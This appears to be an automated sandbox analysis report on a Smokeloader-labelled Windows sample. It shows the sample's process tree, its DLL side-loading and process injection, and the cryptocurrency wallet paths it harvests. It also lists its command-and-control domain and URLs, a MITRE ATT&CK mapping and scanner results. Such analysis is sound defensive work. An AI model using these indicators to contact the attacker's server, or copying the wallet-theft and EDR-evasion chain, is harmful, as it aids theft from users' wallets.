                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D3D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: Electrum
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D28000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: ZSOFTWARE\Microsoft\Windows NT\CurrentVersion\C:\Users\user\AppData\Roaming\Electrum\wallets\C:\Users\user\AppData\Roaming\Armory\databases
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wallets\JaxxLiberty\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D32000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wallets\Exodus\exodus.wallet
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D32000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wallets\Exodus\exodus.wallet
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_6E232860 _gpg_w32_bindtextdomain,strlen,malloc,memcpy,strchr,strlen,strlen,strlen,malloc,memcpy,memcpy,memcpy,free,calloc,memcpy,malloc,memcpy,EnterCriticalSection,strcmp,LeaveCriticalSection,free,free,free,EnterCriticalSection,strcmp,LeaveCriticalSection,free,free,free,free,1_2_6E232860
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | Code function: 1_2_6E2377E0 TlsAlloc,LocalAlloc,TlsGetValue,LocalFree,LocalAlloc,TlsSetValue,TlsGetValue,LocalFree,TlsFree,TlsSetValue,GetModuleFileNameW,WideCharToMultiByte,WideCharToMultiByte,malloc,WideCharToMultiByte,strrchr,strrchr,strcmp,strlen,_gpg_w32_bindtextdomain,free,malloc,1_2_6E2377E0
MITRE ATT&CK Matrix, listed per tactic (a number in parentheses after a technique is the count of signatures matched for that technique; techniques without a number are the unmatched defaults of the matrix):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API (4), Command and Scripting Interpreter (3), Service Execution (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (11), Windows Service (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Abuse Elevation Control Mechanism (1), DLL Side-Loading (11), Access Token Manipulation (1), Windows Service (1), Process Injection (213), RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (11), File Deletion (1), Masquerading (21), Virtualization/Sandbox Evasion (11), Access Token Manipulation (1), Process Injection (213)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (12), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (146), Security Software Discovery (131), Process Discovery (2), Virtualization/Sandbox Evasion (11), System Owner/User Discovery (1), Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Local System (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Encrypted Channel (21), Non-Application Layer Protocol (2), Application Layer Protocol (13), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1527626; Sample: KClGcCpDAP.exe; Start date: 07/10/2024; Architecture: WINDOWS; Score: 96

Behavior graph, rendered as a process tree (node ids from the graph are given in parentheses; the number after a process name is the graph's own per-process count):

• Start (node 2)
  • DNS/IP: apokalipo.cyou (node 74)
  • Signatures: Malicious sample detected (through community Yara rule) (node 78); Multi AV Scanner detection for submitted file (node 80); Yara detected UAC Bypass using CMSTP (node 82); AI detected suspicious sample (node 84)
  • started KClGcCpDAP.exe 3 (node 11)
    • dropped: C:\Windows\Temp\...\KClGcCpDAP.exe, PE32 (node 64)
    • started KClGcCpDAP.exe 14 (node 19)
      • dropped: C:\Windows\Temp\...\Virtual.exe, PE32+ (node 50); C:\Windows\Temp\...\msvcr100.dll, PE32+ (node 52); C:\Windows\Temp\...\msvcp100.dll, PE32+ (node 54); 3 other files (none is malicious) (node 58)
      • started Virtual.exe 8 (node 27)
        • dropped: C:\Users\user\AppData\Roaming\...\Virtual.exe, PE32+ (node 66); C:\Users\user\AppData\...\msvcr100.dll, PE32+ (node 68); C:\Users\user\AppData\...\msvcp100.dll, PE32+ (node 70); 2 other files (none is malicious) (node 72)
        • Signatures: Found direct / indirect Syscall (likely to bypass EDR) (node 102)
        • started Virtual.exe 1 (node 37)
          • Signatures: Maps a DLL or memory area into another process (node 86); Found direct / indirect Syscall (likely to bypass EDR) (node 88)
          • started cmd.exe 5 (node 40)
            • dropped: C:\Users\user\...\validPower_Lnz_x64.exe, PE32+ (node 60); C:\Users\user\AppData\...\jamulieilmfjkk, PE32+ (node 62)
            • Signatures: Writes to foreign memory regions (node 94); Found hidden mapped module (file has been removed from disk) (node 96); Maps a DLL or memory area into another process (node 98); Switches to a custom stack to bypass stack traces (node 100)
            • started validPower_Lnz_x64.exe (node 44)
              • DNS/IP: apokalipo.cyou 188.114.96.3, 443, 49739, 49740 CLOUDFLARENETUS European Union (node 76)
              • Signatures: Found many strings related to Crypto-Wallets (likely being stolen) (node 104); Tries to harvest and steal Bitcoin Wallet information (node 106); Found direct / indirect Syscall (likely to bypass EDR) (node 108)
            • started conhost.exe (node 48)
  • started Virtual.exe 1 (node 14)
    • Signatures: Maps a DLL or memory area into another process (node 110); Found direct / indirect Syscall (likely to bypass EDR) (node 112)
    • started cmd.exe 2 (node 22)
      • dropped: C:\Users\user\AppData\Local\Temp\bewwwy, PE32+ (node 56)
      • Signatures: Writes to foreign memory regions (node 90); Maps a DLL or memory area into another process (node 92)
      • started validPower_Lnz_x64.exe (node 31); conhost.exe (node 33)
  • started Virtual.exe 1 (node 17)
    • started cmd.exe 1 (node 25)
      • started conhost.exe (node 35)

Source | Detection | Scanner | Label
KClGcCpDAP.exe | 8% | Virustotal |
KClGcCpDAP.exe | 24% | ReversingLabs | Win32.Trojan.Smokeloader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxDDU.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\VBoxRT.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcp100.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\msvcr100.dll | 0% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dll | 8% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxDDU.dll | 0% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\VBoxRT.dll | 3% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | 0% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcp100.dll | 0% | ReversingLabs |
C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\msvcr100.dll | 0% | ReversingLabs |
C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe | 8% | ReversingLabs |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://www.openssl.org/support/faq.html | 0% | URL Reputation | safe
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://www.symauth.com/cps0( | 0% | URL Reputation | safe
http://www.symauth.com/rpa00 | 0% | URL Reputation | safe
http://crl.v | 0% | URL Reputation | safe
http://www.vmware.com/0 | 0% | Virustotal |
http://www.openssl.org/support/faq.html....................D: | 0% | Virustotal |
http://www.softwareok.com/?Freeware/Find.Same.Images.OK | 0% | Virustotal |
http://virtualbox.org/firmware/VBoxEFIDual.fd | 0% | Virustotal |
http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVB | 0% | Virustotal |
http://www.softwareok.de/?Freeware/Find.Same.Images.OK | 1% | Virustotal |
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History | 0% | Virustotal |
http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificat | 0% | Virustotal |
http://virtualbox.org/firmware/VBoxEFI32.fd | 0% | Virustotal |
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History | 0% | Virustotal |
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0 | 0% | Virustotal |
http://curl.haxx.se/rfc/cookie_spec.html | 0% | Virustotal |
https://apokalipo.cyou/ | 0% | Virustotal |
http://www.softwareok.de | 0% | Virustotal |
http://www.vmware.com/schema/ovf/1/envelope | 0% | Virustotal |
http://www.vmware.com/interfaces/specifications/vmdk.html#compressed | 0% | Virustotal |
http://www.virtualbox.org/ovf/machine | 0% | Virustotal |
http://virtualbox.org/firmware/VBoxEFI64.fd | 0% | Virustotal |
http://www.vmware.com/0/ | 0% | Virustotal |
http://www.softwareok.com/?Download=Find.Same.Images.OK | 0% | Virustotal |
http://www.softwareok.de/?Download=Find.Same.Images.OK | 1% | Virustotal |
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd | 0% | Virustotal |
http://www.info-zip.org/ | 0% | Virustotal |
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor | 0% | Virustotal |
http://www.innotek.de/VirtualBox-settings | 0% | Virustotal |
https://gnu.org/licenses/gpl.html | 0% | Virustotal |
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0 | 0% | Virustotal |
http://relaxng.org/ns/structure/1.0allocating | 0% | Virustotal |
http://www.vmware.com/specifications/vmdk.html#compressed | 0% | Virustotal |
https://gnu.org/licenses/ | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
apokalipo.cyou | 188.114.96.3 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.openssl.org/support/faq.html....................D: | Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | | unknown
https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.htmleldbZzsLLytC%2FMtKEkDE | validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://schemas.mic | KClGcCpDAP.exe, 00000000.00000003.1728770025.000000000135B000.00000004.00000020.00020000.00000000.sdmp, KClGcCpDAP.exe, 00000000.00000002.1729145495.000000000135E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.vmware.com/0 | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
https://apokalipo.cyou/2t2 | validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLL | validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D76000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
http://www.softwareok.com/?Freeware/Find.Same.Images.OK | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificat | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://virtualbox.org/firmware/VBoxEFIDual.fd | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://virtualbox.org/firmware/VBoxEFI32.fdVBoxEFI64.fdhttp://virtualbox.org/firmware/VBoxEFI64.fdVB | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.openssl.org/support/faq.html | Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | URL Reputation: safe | unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html | validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
https://apokalipo.cyou/N | validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://virtualbox.org/firmware/VBoxEFI32.fd | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0 | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://www.softwareok.de | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
https://apokalipo.cyou/ | validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.softwareok.com/?Download=Find.Same.Images.OK | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://curl.haxx.se/rfc/cookie_spec.html | Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | | unknown
http://www.vmware.com/interfaces/specifications/vmdk.html#compressed | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.vmware.com/schema/ovf/1/envelope | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://virtualbox.org/firmware/VBoxEFI64.fd | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.softwareok.de/?Download=Find.Same.Images.OK | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://ocsp.thawte.com0 | KClGcCpDAP.exe, 00000001.00000003.1703839155.0000000001543000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1712509409.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000002.00000003.1718068778.00000000013F2000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.virtualbox.org/ovf/machine | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.vmware.com/0/ | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0 | validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401F4000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor | KClGcCpDAP.exe, 00000000.00000000.1694739395.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp, KClGcCpDAP.exe, 00000001.00000000.1698457093.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp, KClGcCpDAP.exe, 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp | false | | unknown
http://www.???.xx/?search=%s | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd | Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | | unknown
http://www.symauth.com/cps0( | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://relaxng.org/ns/structure/1.0allocating | Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | | unknown
http://www.symauth.com/rpa00 | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apokalipo.cyou:443/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=Z | validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000482000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000485000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.innotek.de/VirtualBox-settings | Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.info-zip.org/ | Virtual.exe, 00000002.00000002.1722899571.0000000003CFD000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003B5A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.00000000050D8000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2221794602.00000000025B5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://gnu.org/licenses/ | KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp | false | | unknown
http://www.vmware.com/specifications/vmdk.html#compressed | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
https://gnu.org/licenses/gpl.html | KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp | false | | unknown
http://relaxng.org/ns/structure/1.0 | Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp | false | | unknown
http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.vmware.com/specifications/vmdk.html#sparse | Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | false | | unknown
http://www.surfok.de/ | validPower_Lnz_x64.exe, 0000000A.00000000.1977816040.0000000140156000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
http://crl.v | validPower_Lnz_x64.exe, 0000000A.00000003.2202727575.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2211577219.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219967891.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.softwareok.com | Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000000.1977926263.00000001401E0000.00000002.00000001.01000000.00000017.sdmp | false | | unknown
